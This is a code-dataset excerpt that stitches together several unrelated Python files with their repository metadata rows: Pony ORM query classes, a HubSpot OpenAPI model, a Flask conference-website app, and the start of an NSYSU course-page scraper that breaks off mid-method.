query._fetch().show(width)
@cut_traceback
def get(query):
objects = query[:2]
if not objects: return None
if len(objects) > 1: throw(MultipleObjectsFoundError,
'Multiple objects were found. Use select(...) to retrieve them')
return objects[0]
@cut_traceback
def first(query):
translator = query._translator
if translator.order: pass
elif type(translator.expr_type) is tuple:
query = query.order_by(*[i+1 for i in xrange(len(query._translator.expr_type))])
else:
query = query.order_by(1)
objects = query.without_distinct()[:1]
if not objects: return None
return objects[0]
@cut_traceback
def without_distinct(query):
return query._clone(_distinct=False)
@cut_traceback
def distinct(query):
return query._clone(_distinct=True)
@cut_traceback
def exists(query):
objects = query[:1]
return bool(objects)
@cut_traceback
def delete(query, bulk=None):
if not bulk:
if not isinstance(query._translator.expr_type, EntityMeta): throw(TypeError,
'Delete query should be applied to a single entity. Got: %s'
% ast2src(query._translator.tree.expr))
objects = query._actual_fetch()
for obj in objects: obj._delete_()
return len(objects)
translator = query._translator
sql_key = HashableDict(query._key, sql_command='DELETE')
database = query._database
cache = database._get_cache()
cache_entry = database._constructed_sql_cache.get(sql_key)
if cache_entry is None:
sql_ast = translator.construct_delete_sql_ast()
cache_entry = database.provider.ast2sql(sql_ast)
database._constructed_sql_cache[sql_key] = cache_entry
sql, adapter = cache_entry
arguments = adapter(query._vars)
cache.immediate = True
cache.prepare_connection_for_query_execution() # may clear cache.query_results
cursor = database._exec_sql(sql, arguments)
return cursor.rowcount
@cut_traceback
def __len__(query):
return len(query._actual_fetch())
@cut_traceback
def __iter__(query):
return iter(query._fetch(lazy=True))
@cut_traceback
def order_by(query, *args):
return query._order_by('order_by', *args)
@cut_traceback
def sort_by(query, *args):
return query._order_by('sort_by', *args)
def _order_by(query, method_name, *args):
if not args: throw(TypeError, '%s() method requires at least one argument' % method_name)
if args[0] is None:
if len(args) > 1: throw(TypeError, 'When first argument of %s() method is None, it must be the only argument' % method_name)
tup = (('without_order',),)
new_key = HashableDict(query._key, filters=query._key['filters'] + tup)
new_filters = query._filters + tup
new_translator, new_vars = query._get_translator(new_key, query._vars)
if new_translator is None:
new_translator = query._translator.without_order()
query._database._translator_cache[new_key] = new_translator
return query._clone(_key=new_key, _filters=new_filters, _translator=new_translator)
if isinstance(args[0], (basestring, types.FunctionType)):
func, globals, locals = get_globals_and_locals(args, kwargs=None, frame_depth=cut_traceback_depth+2)
return query._process_lambda(func, globals, locals, order_by=True)
if isinstance(args[0], RawSQL):
raw = args[0]
return query.order_by(lambda: raw)
attributes = numbers = False
for arg in args:
if isinstance(arg, int_types): numbers = True
elif isinstance(arg, (Attribute, DescWrapper)): attributes = True
else: throw(TypeError, "order_by() method receive an argument of invalid type: %r" % arg)
if numbers and attributes:
throw(TypeError, 'order_by() method receive invalid combination of arguments')
tup = (('order_by_numbers' if numbers else 'order_by_attributes', args),)
new_key = HashableDict(query._key, filters=query._key['filters'] + tup)
new_filters = query._filters + tup
new_translator, new_vars = query._get_translator(new_key, query._vars)
if new_translator is None:
if numbers: new_translator = query._translator.order_by_numbers(args)
else: new_translator = query._translator.order_by_attributes(args)
query._database._translator_cache[new_key] = new_translator
return query._clone(_key=new_key, _filters=new_filters, _translator=new_translator)
def _process_lambda(query, func, globals, locals, order_by=False, original_names=False):
prev_translator = query._translator
argnames = ()
if isinstance(func, basestring):
func_id = func
func_ast = string2ast(func)
if isinstance(func_ast, ast.Lambda):
argnames = get_lambda_args(func_ast)
func_ast = func_ast.code
cells = None
elif type(func) is types.FunctionType:
argnames = get_lambda_args(func)
func_id = id(func.func_code if PY2 else func.__code__)
func_ast, external_names, cells = decompile(func)
elif not order_by: throw(TypeError,
'Argument of filter() method must be a lambda functon or its text. Got: %r' % func)
else: assert False # pragma: no cover
if argnames:
if original_names:
for name in argnames:
if name not in prev_translator.namespace: throw(TypeError,
'Lambda argument `%s` does not correspond to any variable in original query' % name)
else:
expr_type = prev_translator.expr_type
expr_count = len(expr_type) if type(expr_type) is tuple else 1
if len(argnames) != expr_count:
throw(TypeError, 'Incorrect number of lambda arguments. '
'Expected: %d, got: %d' % (expr_count, len(argnames)))
else:
original_names = True
new_filter_num = query._filter_num + 1
func_ast, extractors = create_extractors(
func_id, func_ast, globals, locals, special_functions, const_functions, argnames or prev_translator.namespace)
if extractors:
vars, vartypes = extract_vars(func_id, new_filter_num, extractors, globals, locals, cells)
query._database.provider.normalize_vars(vars, vartypes)
new_vars = query._vars.copy()
new_vars.update(vars)
else: new_vars, vartypes = query._vars, HashableDict()
tup = (('order_by' if order_by else 'where' if original_names else 'filter', func_id, vartypes),)
new_key = HashableDict(query._key, filters=query._key['filters'] + tup)
new_filters = query._filters + (('apply_lambda', func_id, new_filter_num, order_by, func_ast, argnames, original_names, extractors, None, vartypes),)
new_translator, new_vars = query._get_translator(new_key, new_vars)
if new_translator is None:
prev_optimized = prev_translator.optimize
new_translator = prev_translator.apply_lambda(func_id, new_filter_num, order_by, func_ast, argnames, original_names, extractors, new_vars, vartypes)
if not prev_optimized:
name_path = new_translator.can_be_optimized()
if name_path:
tree_copy = unpickle_ast(prev_translator.pickled_tree) # tree = deepcopy(tree)
translator_cls = prev_translator.__class__
try:
new_translator = translator_cls(
tree_copy, None, prev_translator.original_code_key, prev_translator.original_filter_num,
prev_translator.extractors, None, prev_translator.vartypes.copy(),
left_join=True, optimize=name_path)
except UseAnotherTranslator:
assert False
new_translator = query._reapply_filters(new_translator)
new_translator = new_translator.apply_lambda(func_id, new_filter_num, order_by, func_ast, argnames, original_names, extractors, new_vars, vartypes)
query._database._translator_cache[new_key] = new_translator
return query._clone(_filter_num=new_filter_num, _vars=new_vars, _key=new_key, _filters=new_filters,
_translator=new_translator)
def _reapply_filters(query, translator):
for tup in query._filters:
method_name, args = tup[0], tup[1:]
translator_method = getattr(translator, method_name)
translator = translator_method(*args)
return translator
@cut_traceback
def filter(query, *args, **kwargs):
if args:
if isinstance(args[0], RawSQL):
raw = args[0]
return query.filter(lambda: raw)
func, globals, locals = get_globals_and_locals(args, kwargs, frame_depth=cut_traceback_depth+1)
return query._process_lambda(func, globals, locals, order_by=False)
if not kwargs: return query
entity = query._translator.expr_type
if not isinstance(entity, EntityMeta): throw(TypeError,
'Keyword arguments are not allowed: since query result type is not an entity, filter() method can accept only lambda')
return query._apply_kwargs(kwargs)
@cut_traceback
def where(query, *args, **kwargs):
if args:
if isinstance(args[0], RawSQL):
raw = args[0]
return query.where(lambda: raw)
func, globals, locals = get_globals_and_locals(args, kwargs, frame_depth=cut_traceback_depth+1)
return query._process_lambda(func, globals, locals, order_by=False, original_names=True)
if not kwargs: return query
if len(query._translator.tree.quals) > 1: throw(TypeError,
'Keyword arguments are not allowed: query iterates over more than one entity')
return query._apply_kwargs(kwargs, original_names=True)
def _apply_kwargs(query, kwargs, original_names=False):
translator = query._translator
if original_names:
tablerefs = translator.sqlquery.tablerefs
alias = translator.tree.quals[0].assign.name
tableref = tablerefs[alias]
entity = tableref.entity
else:
entity = translator.expr_type
get_attr = entity._adict_.get
filterattrs = []
value_dict = {}
next_id = query._next_kwarg_id
for attrname, val in sorted(iteritems(kwargs)):
attr = get_attr(attrname)
if attr is None: throw(AttributeError,
'Entity %s does not have attribute %s' % (entity.__name__, attrname))
if attr.is_collection: throw(TypeError,
'%s attribute %s cannot be used as a keyword argument for filtering'
% (attr.__class__.__name__, attr))
val = attr.validate(val, None, entity, from_db=False)
id = next_id
next_id += 1
filterattrs.append((attr, id, val is None))
value_dict[id] = val
filterattrs = tuple(filterattrs)
tup = (('apply_kwfilters', filterattrs, original_names),)
new_key = HashableDict(query._key, filters=query._key['filters'] + tup)
new_filters = query._filters + tup
new_vars = query._vars.copy()
new_vars.update(value_dict)
new_translator, new_vars = query._get_translator(new_key, new_vars)
if new_translator is None:
new_translator = translator.apply_kwfilters(filterattrs, original_names)
query._database._translator_cache[new_key] = new_translator
return query._clone(_key=new_key, _filters=new_filters, _translator=new_translator,
_next_kwarg_id=next_id, _vars=new_vars)
@cut_traceback
def __getitem__(query, key):
if not isinstance(key, slice):
throw(TypeError, 'If you want apply index to a query, convert it to list first')
step = key.step
if step is not None and step != 1: throw(TypeError, "Parameter 'step' of slice object is not allowed here")
start = key.start
if start is None: start = 0
elif start < 0: throw(TypeError, "Parameter 'start' of slice object cannot be negative")
stop = key.stop
if stop is None:
if not start:
return query._fetch()
else:
return query._fetch(limit=None, offset=start)
if start >= stop:
return query._fetch(limit=0)
return query._fetch(limit=stop-start, offset=start)
def _fetch(query, limit=None, offset=None, lazy=False):
return QueryResult(query, limit, offset, lazy=lazy)
@cut_traceback
def fetch(query, limit=None, offset=None):
return query._fetch(limit, offset)
@cut_traceback
def limit(query, limit=None, offset=None):
return query._fetch(limit, offset, lazy=True)
@cut_traceback
def page(query, pagenum, pagesize=10):
offset = (pagenum - 1) * pagesize
return query._fetch(pagesize, offset, lazy=True)
def _aggregate(query, aggr_func_name, distinct=None, sep=None):
translator = query._translator
sql, arguments, attr_offsets, query_key = query._construct_sql_and_arguments(
aggr_func_name=aggr_func_name, aggr_func_distinct=distinct, sep=sep)
cache = query._database._get_cache()
try: result = cache.query_results[query_key]
except KeyError:
cursor = query._database._exec_sql(sql, arguments)
row = cursor.fetchone()
if row is not None: result = row[0]
else: result = None
if result is None and aggr_func_name == 'SUM': result = 0
if result is None: pass
elif aggr_func_name == 'COUNT': pass
else:
if aggr_func_name == 'AVG':
expr_type = float
elif aggr_func_name == 'GROUP_CONCAT':
expr_type = basestring
else:
expr_type = translator.expr_type
provider = query._database.provider
converter = provider.get_converter_by_py_type(expr_type)
result = converter.sql2py(result)
if query_key is not None: cache.query_results[query_key] = result
return result
@cut_traceback
def sum(query, distinct=None):
return query._aggregate('SUM', distinct)
@cut_traceback
def avg(query, distinct=None):
return query._aggregate('AVG', distinct)
@cut_traceback
def group_concat(query, sep=None, distinct=None):
if sep is not None:
if not isinstance(sep, basestring):
throw(TypeError, '`sep` option for `group_concat` should be of type str. Got: %s' % type(sep).__name__)
return query._aggregate('GROUP_CONCAT', distinct, sep)
@cut_traceback
def min(query):
return query._aggregate('MIN')
@cut_traceback
def max(query):
return query._aggregate('MAX')
@cut_traceback
def count(query, distinct=None):
return query._aggregate('COUNT', distinct)
@cut_traceback
def for_update(query, nowait=False):
provider = query._database.provider
if nowait and not provider.select_for_update_nowait_syntax: throw(TranslationError,
'%s provider does not support SELECT FOR UPDATE NOWAIT syntax' % provider.dialect)
return query._clone(_for_update=True, _nowait=nowait)
def random(query, limit):
return query.order_by('random()')[:limit]
def to_json(query, include=(), exclude=(), converter=None, with_schema=True, schema_hash=None):
return query._database.to_json(query[:], include, exclude, converter, with_schema, schema_hash)
def strcut(s, width):
if len(s) <= width:
return s + ' ' * (width - len(s))
else:
return s[:width-3] + '...'
class QueryResultIterator(object):
__slots__ = '_query_result', '_position'
def __init__(self, query_result):
self._query_result = query_result
self._position = 0
def _get_type_(self):
if self._position != 0:
throw(NotImplementedError, 'Cannot use partially exhausted iterator, please convert to list')
return self._query_result._get_type_()
def _normalize_var(self, query_type):
if self._position != 0: throw(NotImplementedError)
return self._query_result._normalize_var(query_type)
def next(self):
qr = self._query_result
if qr._items is None:
qr._items = qr._query._actual_fetch(qr._limit, qr._offset)
if self._position >= len(qr._items):
raise StopIteration
item = qr._items[self._position]
self._position += 1
return item
__next__ = next
def __length_hint__(self):
return len(self._query_result) - self._position
def make_query_result_method_error_stub(name, title=None):
def func(self, *args, **kwargs):
throw(TypeError, 'In order to do %s, cast QueryResult to list first' % (title or name))
return func
class QueryResult(object):
__slots__ = '_query', '_limit', '_offset', '_items', '_expr_type', '_col_names'
def __init__(self, query, limit, offset, lazy):
translator = query._translator
self._query = query
self._limit = limit
self._offset = offset
self._items = None if lazy else self._query._actual_fetch(limit, offset)
self._expr_type = translator.expr_type
self._col_names = translator.col_names
def _get_type_(self):
if self._items is None:
return QueryType(self._query, self._limit, self._offset)
item_type = self._query._translator.expr_type
return tuple(item_type for item in self._items)
def _normalize_var(self, query_type):
if self._items is None:
return query_type, self._query
items = tuple(normalize(item) for item in self._items)
item_type = self._query._translator.expr_type
return tuple(item_type for item in items), items
def _get_items(self):
if self._items is None:
self._items = self._query._actual_fetch(self._limit, self._offset)
return self._items
def __getstate__(self):
return self._get_items(), self._limit, self._offset, self._expr_type, self._col_names
def __setstate__(self, state):
self._query = None
self._items, self._limit, self._offset, self._expr_type, self._col_names = state
def __repr__(self):
if self._items is not None:
return self.__str__()
return '<Lazy QueryResult object at %s>' % hex(id(self))
def __str__(self):
return repr(self._get_items())
def __iter__(self):
return QueryResultIterator(self)
def __len__(self):
if self._items is None:
self._items = self._query._actual_fetch(self._limit, self._offset)
return len(self._items)
def __getitem__(self, key):
if self._items is None:
self._items = self._query._actual_fetch(self._limit, self._offset)
return self._items[key]
def __contains__(self, item):
return item in self._get_items()
def index(self, item):
return self._get_items().index(item)
def _other_items(self, other):
return other._get_items() if isinstance(other, QueryResult) else other
def __eq__(self, other):
return self._get_items() == self._other_items(other)
def __ne__(self, other):
return self._get_items() != self._other_items(other)
def __lt__(self, other):
return self._get_items() < self._other_items(other)
def __le__(self, other):
return self._get_items() <= self._other_items(other)
def __gt__(self, other):
return self._get_items() > self._other_items(other)
def __ge__(self, other):
return self._get_items() >= self._other_items(other)
def __reversed__(self):
return reversed(self._get_items())
def reverse(self):
self._get_items().reverse()
def sort(self, *args, **kwargs):
self._get_items().sort(*args, **kwargs)
def shuffle(self):
shuffle(self._get_items())
@cut_traceback
def show(self, width=None):
if self._items is None:
self._items = self._query._actual_fetch(self._limit, self._offset)
if not width: width = options.CONSOLE_WIDTH
max_columns = width // 5
expr_type = self._expr_type
col_names = self._col_names
def to_str(x):
return tostring(x).replace('\n', ' ')
if isinstance(expr_type, EntityMeta):
entity = expr_type
col_names = [ attr.name for attr in entity._attrs_
if not attr.is_collection and not attr.lazy ][:max_columns]
if len(col_names) == 1:
col_name = col_names[0]
row_maker = lambda obj: (getattr(obj, col_name),)
else: row_maker = attrgetter(*col_names)
rows = [tuple(to_str(value) for value in row_maker(obj)) for obj in self._items]
elif len(col_names) == 1:
rows = [(to_str(obj),) for obj in self._items]
else:
rows = [tuple(to_str(value) for value in row) for row in self._items]
remaining_columns = {}
for col_num, colname in enumerate(col_names):
if not rows: max_len = len(colname)
else: max_len = max(len(colname), max(len(row[col_num]) for row in rows))
remaining_columns[col_num] = max_len
width_dict = {}
available_width = width - len(col_names) + 1
while remaining_columns:
base_len = (available_width - len(remaining_columns) + 1) // len(remaining_columns)
for col_num, max_len in remaining_columns.items():
if max_len <= base_len:
width_dict[col_num] = max_len
del remaining_columns[col_num]
available_width -= max_len
break
else: break
if remaining_columns:
base_len = available_width // len(remaining_columns)
for col_num, max_len in remaining_columns.items():
width_dict[col_num] = base_len
print(strjoin('|', (strcut(colname, width_dict[i]) for i, colname in enumerate(col_names))))
print(strjoin('+', ('-' * width_dict[i] for i in xrange(len(col_names)))))
for row in rows:
print(strjoin('|', (strcut(item, width_dict[i]) for i, item in enumerate(row))))
def to_json(self, include=(), exclude=(), converter=None, with_schema=True, schema_hash=None):
return self._query._database.to_json(self, include, exclude, converter, with_schema, schema_hash)
def __add__(self, other):
result = []
result.extend(self)
result.extend(other)
return result
def __radd__(self, other):
result = []
result.extend(other)
result.extend(self)
return result
def to_list(self):
return list(self)
__setitem__ = make_query_result_method_error_stub('__setitem__', 'item assignment')
__delitem__ = make_query_result_method_error_stub('__delitem__', 'item deletion')
__iadd__ = make_query_result_method_error_stub('__iadd__', '+=')
__imul__ = make_query_result_method_error_stub('__imul__', '*=')
__mul__ = make_query_result_method_error_stub('__mul__', '*')
__rmul__ = make_query_result_method_error_stub('__rmul__', '*')
append = make_query_result_method_error_stub('append', 'append')
clear = make_query_result_method_error_stub('clear', 'clear')
extend = make_query_result_method_error_stub('extend', 'extend')
insert = make_query_result_method_error_stub('insert', 'insert')
pop = make_query_result_method_error_stub('pop', 'pop')
remove = make_query_result_method_error_stub('remove', 'remove')
@cut_traceback
def show(entity):
x = entity
if isinstance(x, EntityMeta):
print(x.describe())
elif isinstance(x, Entity):
print('instance of ' + x.__class__.__name__)
# width = options.CONSOLE_WIDTH
# for attr in x._attrs_:
# if attr.is_collection or attr.lazy: continue
# value = str(attr.__get__(x)).replace('\n', ' ')
# print(' %s: %s' % (attr.name, strcut(value, width-len(attr.name)-4)))
# print()
QueryResult([ x ], None, x.__class__, None).show()
elif isinstance(x, (basestring, types.GeneratorType)):
select(x).show()
elif hasattr(x, 'show'):
x.show()
else:
from pprint import pprint
pprint(x)
special_functions = {itertools.count, utils.count, count, random, raw_sql, getattr}
const_functions = {buffer, Decimal, datetime.datetime, datetime.date, datetime.time, datetime.timedelta}
| 47.599578 | 167 | 0.606485 |
8a46493a938e0618ecff299c0ec1ffec1afbe029 | 3,586 | py | Python | hubspot/crm/deals/models/batch_input_simple_public_object_batch_input.py | Ronfer/hubspot-api-python | 1c87274ecbba4aa3c7728f890ccc6e77b2b6d2e4 | [
"Apache-2.0"
] | 117 | 2020-04-06T08:22:53.000Z | 2022-03-18T03:41:29.000Z | hubspot/crm/deals/models/batch_input_simple_public_object_batch_input.py | Ronfer/hubspot-api-python | 1c87274ecbba4aa3c7728f890ccc6e77b2b6d2e4 | [
"Apache-2.0"
] | 62 | 2020-04-06T16:21:06.000Z | 2022-03-17T16:50:44.000Z | hubspot/crm/deals/models/batch_input_simple_public_object_batch_input.py | Ronfer/hubspot-api-python | 1c87274ecbba4aa3c7728f890ccc6e77b2b6d2e4 | [
"Apache-2.0"
] | 45 | 2020-04-06T16:13:52.000Z | 2022-03-30T21:33:17.000Z | # coding: utf-8
"""
Deals
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v3
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from hubspot.crm.deals.configuration import Configuration
class BatchInputSimplePublicObjectBatchInput(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {"inputs": "list[SimplePublicObjectBatchInput]"}
attribute_map = {"inputs": "inputs"}
def __init__(self, inputs=None, local_vars_configuration=None): # noqa: E501
"""BatchInputSimplePublicObjectBatchInput - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._inputs = None
self.discriminator = None
self.inputs = inputs
@property
def inputs(self):
"""Gets the inputs of this BatchInputSimplePublicObjectBatchInput. # noqa: E501
:return: The inputs of this BatchInputSimplePublicObjectBatchInput. # noqa: E501
:rtype: list[SimplePublicObjectBatchInput]
"""
return self._inputs
@inputs.setter
def inputs(self, inputs):
"""Sets the inputs of this BatchInputSimplePublicObjectBatchInput.
:param inputs: The inputs of this BatchInputSimplePublicObjectBatchInput. # noqa: E501
:type: list[SimplePublicObjectBatchInput]
"""
if self.local_vars_configuration.client_side_validation and inputs is None: # noqa: E501
raise ValueError("Invalid value for `inputs`, must not be `None`") # noqa: E501
self._inputs = inputs
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items()))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, BatchInputSimplePublicObjectBatchInput):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, BatchInputSimplePublicObjectBatchInput):
return True
return self.to_dict() != other.to_dict()
| 32.306306 | 139 | 0.639431 |
0899c56fcd78917a82681bf56f5fb1875b043b6d | 177 | py | Python | examples/iterator.py | calind/zipa | d2f3572454456aafe952a911b4881f4862b3730c | [
"Apache-2.0"
] | null | null | null | examples/iterator.py | calind/zipa | d2f3572454456aafe952a911b4881f4862b3730c | [
"Apache-2.0"
] | null | null | null | examples/iterator.py | calind/zipa | d2f3572454456aafe952a911b4881f4862b3730c | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# vim: ft=python:sw=4:ts=4:sts=4:et:
from zipa import api_github_com as github
repos = github.orgs.django.repos
for repo in repos:
print repo.name
| 19.666667 | 41 | 0.689266 |
eac17946bd39b43439cf1781e5b516f51b25a3b4 | 179 | py | Python | src/aiohttp_micro/core/entities.py | clayman083/aiohttp-micro | 0d183f11a03beb0a51357eb4ad6134ce01e347a4 | [
"MIT"
] | 1 | 2019-11-04T12:15:39.000Z | 2019-11-04T12:15:39.000Z | src/aiohttp_micro/core/entities.py | clayman74/aiohttp-micro | 0d183f11a03beb0a51357eb4ad6134ce01e347a4 | [
"MIT"
] | null | null | null | src/aiohttp_micro/core/entities.py | clayman74/aiohttp-micro | 0d183f11a03beb0a51357eb4ad6134ce01e347a4 | [
"MIT"
] | 1 | 2021-11-16T15:24:44.000Z | 2021-11-16T15:24:44.000Z | from dataclasses import dataclass
@dataclass
class Entity:
key: int
@dataclass
class Payload:
pass
@dataclass
class Filters:
limit: int = 10
offset: int = 0
| 9.944444 | 33 | 0.681564 |
d4dafa990fc14a5251e375aadfdd5ad69d1d1ccd | 8,604 | py | Python | main.py | bguedj/COLT-2020 | 7ee74b79fe1db8118438fb780a9e4babd8ec6590 | [
"MIT"
] | null | null | null | main.py | bguedj/COLT-2020 | 7ee74b79fe1db8118438fb780a9e4babd8ec6590 | [
"MIT"
] | null | null | null | main.py | bguedj/COLT-2020 | 7ee74b79fe1db8118438fb780a9e4babd8ec6590 | [
"MIT"
] | null | null | null | # pylint: disable=global-statement,redefined-outer-name
import argparse
import csv
import glob
import json
import os
import yaml
from flask import Flask, jsonify, redirect, render_template, send_from_directory
from flask_frozen import Freezer
from flaskext.markdown import Markdown
site_data = {}
by_uid = {}
def main(site_data_path):
global site_data, extra_files
extra_files = ["README.md"]
# Load all for your sitedata one time.
for f in glob.glob(site_data_path + "/*"):
extra_files.append(f)
name, typ = f.split("/")[-1].split(".")
if typ == "json":
site_data[name] = json.load(open(f))
elif typ in {"csv", "tsv"}:
site_data[name] = list(csv.DictReader(open(f)))
elif typ == "yml":
site_data[name] = yaml.load(open(f).read(), Loader=yaml.SafeLoader)
for typ in ["papers", "speakers", "open_problems", "pdfs"]:
by_uid[typ] = {}
for p in site_data[typ]:
by_uid[typ][p["UID"]] = p
print("Data Successfully Loaded")
return extra_files
# ------------- SERVER CODE -------------------->
app = Flask(__name__)
app.config.from_object(__name__)
freezer = Freezer(app)
markdown = Markdown(app)
# MAIN PAGES
def _data():
data = {}
data["config"] = site_data["config"]
return data
@app.route("/")
def index():
return redirect("/schedule.html")
# TOP LEVEL PAGES
# @app.route("/index.html")
# def home():
# data = _data()
# data["readme"] = open("README.md").read()
# data["committee"] = site_data["committee"]["committee"]
# return render_template("index.html", **data)
#@app.route("/about.html")
#def about():
# data = _data()
# data["FAQ"] = site_data["faq"]["FAQ"]
# return render_template("about.html", **data)
@app.route("/papers.html")
def papers():
data = _data()
data["zoom"] = site_data["zoom"]
# data["papers"] = site_data["papers"]
return render_template("papers.html", **data)
#@app.route("/paper_vis.html")
#def paper_vis():
# data = _data()
# return render_template("papers_vis.html", **data)
@app.route("/schedule.html")
def schedule():
data = _data()
data["zoom"] = site_data["zoom"]
data["day"] = {
"speakers": site_data["speakers"],
# "highlighted": [
# format_paper(by_uid["papers"][h["UID"]]) for h in site_data["highlighted"]
# ],
}
return render_template("schedule.html", **data)
@app.route("/keynotes.html")
def keynotes():
data = _data()
data["zoom"] = site_data["zoom"]
data["day"] = {
"speakers": site_data["speakers"],
}
return render_template("keynotes.html", **data)
@app.route("/format.html")
def conference_format():
data = _data()
data["zoom"] = site_data["zoom"]
return render_template("format.html", **data)
@app.route("/news.html")
def news():
data = _data()
return render_template("news.html", **data)
#@app.route("/subject_areas.html")
#def subject_areas():
# data = _data()
# return render_template("subject_areas.html", **data)
@app.route("/plain.html")
def plain():
data = _data()
return render_template("plain.html", **data)
#@app.route("/workshops.html")
#def workshops():
# data = _data()
# data["workshops"] = [
# format_workshop(workshop) for workshop in site_data["workshops"]
# ]
# return render_template("workshops.html", **data)
def extract_list_field(v, key):
value = v.get(key, "")
if isinstance(value, list):
return value
else:
return value.split("|")
def format_paper(v):
list_keys = ["authors", "keywords", "session"]
list_fields = {}
for key in list_keys:
list_fields[key] = extract_list_field(v, key)
return {
"id": v["UID"],
"forum": v["UID"],
"content": {
"title": v["title"],
"authors": list_fields["authors"],
"keywords": list_fields["keywords"],
"abstract": v["abstract"],
"TLDR": v["abstract"],
"recs": [],
"session": list_fields["session"],
"pdf_url": v.get("pdf_url", ""),
"slideslive_1": v["slideslive_1"],
"slideslive_2": v["slideslive_2"],
"zoom": [v["zoom_1"], v["zoom_2"]],
"positions": [v["position_1"], v["position_2"]],
},
}
def format_open_problem(v):
list_keys = ["authors"]
list_fields = {}
for key in list_keys:
list_fields[key] = extract_list_field(v, key)
return {
"id": v["UID"],
"content": {
"title": v["title"],
"authors": list_fields["authors"],
"pdf_url": v.get("pdf_url", ""),
"slideslive": v["slideslive"],
"keywords": ["Open problem"],
"session": ["Session OP"],
"positions": [v["position"]],
"zoom": 0,
},
}
def format_workshop(v):
list_keys = ["authors"]
list_fields = {}
for key in list_keys:
list_fields[key] = extract_list_field(v, key)
return {
"id": v["UID"],
"title": v["title"],
"organizers": list_fields["authors"],
"abstract": v["abstract"],
}
# ITEM PAGES
@app.route("/papers/paper_<poster>.html")
def poster(poster):
uid = poster
data = _data()
if 'OP' in uid:
v = by_uid["open_problems"][uid]
data["paper"] = format_open_problem(v)
data["pdfs"] = by_uid["pdfs"][uid]
return render_template("open_problem.html", **data)
else:
v = by_uid["papers"][uid]
data["paper"] = format_paper(v)
data["pdfs"] = by_uid["pdfs"][uid]
return render_template("poster.html", **data)
@app.route("/speaker_<speaker>.html")
def speaker(speaker):
uid = speaker
v = by_uid["speakers"][uid]
data = _data()
data["zoom"] = site_data["zoom"]
data["speaker"] = v
return render_template("speaker.html", **data)
#@app.route("/workshop_<workshop>.html")
#def workshop(workshop):
# uid = workshop
# v = by_uid["workshops"][uid]
# data = _data()
# data["workshop"] = format_workshop(v)
# return render_template("workshop.html", **data)
#@app.route("/chat.html")
#def chat():
# data = _data()
# return render_template("chat.html", **data)
# FRONT END SERVING
@app.route("/papers.json")
def paper_json():
json = []
for v in site_data["papers"]:
json.append(format_paper(v))
for v in site_data["open_problems"]:
json.append(format_open_problem(v))
return jsonify(json)
@app.route("/static/<path:path>")
def send_static(path):
return send_from_directory("static", path)
@app.route("/serve_<path>.json")
def serve(path):
return jsonify(site_data[path])
# --------------- DRIVER CODE -------------------------->
# Code to turn it all static
@freezer.register_generator
def generator():
for paper in site_data["papers"]:
yield "poster", {"poster": str(paper["UID"])}
for paper in site_data["open_problems"]:
yield "poster", {"poster": str(paper["UID"])}
for speaker in site_data["speakers"]:
yield "speaker", {"speaker": str(speaker["UID"])}
# for workshop in site_data["workshops"]:
# yield "workshop", {"workshop": str(workshop["UID"])}
for key in site_data:
yield "serve", {"path": key}
def parse_arguments():
parser = argparse.ArgumentParser(description="MiniConf Portal Command Line")
parser.add_argument(
"--build",
action="store_true",
default=False,
help="Convert the site to static assets",
)
parser.add_argument(
"-b",
action="store_true",
default=False,
dest="build",
help="Convert the site to static assets",
)
parser.add_argument("path", help="Pass the JSON data path and run the server")
args = parser.parse_args()
return args
if __name__ == "__main__":
args = parse_arguments()
site_data_path = args.path
extra_files = main(site_data_path)
if args.build:
freezer.freeze()
with open("build/zoom.html", "w") as f:
f.write("<html><body><h1>The conference is over!</h1></body></html>")
with open("build/.htaccess", "w") as f:
# f.write('ModPagespeedDisallow "*"\n')
f.write('Options -Indexes\n')
else:
debug_val = False
if os.getenv("FLASK_DEBUG") == "True":
debug_val = True
app.run(port=5000, debug=debug_val, extra_files=extra_files)
| 25.231672 | 87 | 0.58159 |
cac6929c90be117d23719a23bd6105734a9217b0 | 3,162 | py | Python | ClassesPage.py | Hua777/NSYSUSelcrs | b36dc9dd7329c6d20f23d666facaa8e6e5251c63 | [
"MIT"
] | null | null | null | ClassesPage.py | Hua777/NSYSUSelcrs | b36dc9dd7329c6d20f23d666facaa8e6e5251c63 | [
"MIT"
] | null | null | null | ClassesPage.py | Hua777/NSYSUSelcrs | b36dc9dd7329c6d20f23d666facaa8e6e5251c63 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
__author__ = "Hua777"
__copyright__ = "Copyright 2018, Hua777"
__version__ = "2.0"
__email__ = "liao.700529@gmail.com"
import Req
import CC
from ClassDetail import ClassDetail
from bs4 import BeautifulSoup as BS
import re as RE
class ClassesPage(object):
def __init__(self):
self.Reset()
self.Pages = 0
# 设定学年期
def SetYear(self, year):
self.SetConfig('D0', year)
# 设定页数
def SetPage(self, page):
self.SetConfig('page', page)
# 设定老师
def SetTeacher(self, teacher):
self.SetConfig('page', teacher)
# 设定课号
def SetNumber(self, number):
self.SetConfig('T3', number)
def FixToBS(self):
# 学校网站代码有问题,此处为使其恢复正常点
html = RE.sub(
r"<style.*<\/style>",
'<body>',
RE.sub(
r"snall",
'small',
Req.Get('search', self.Config)
)
)
return BS(html, 'html.parser')
# 开始爬
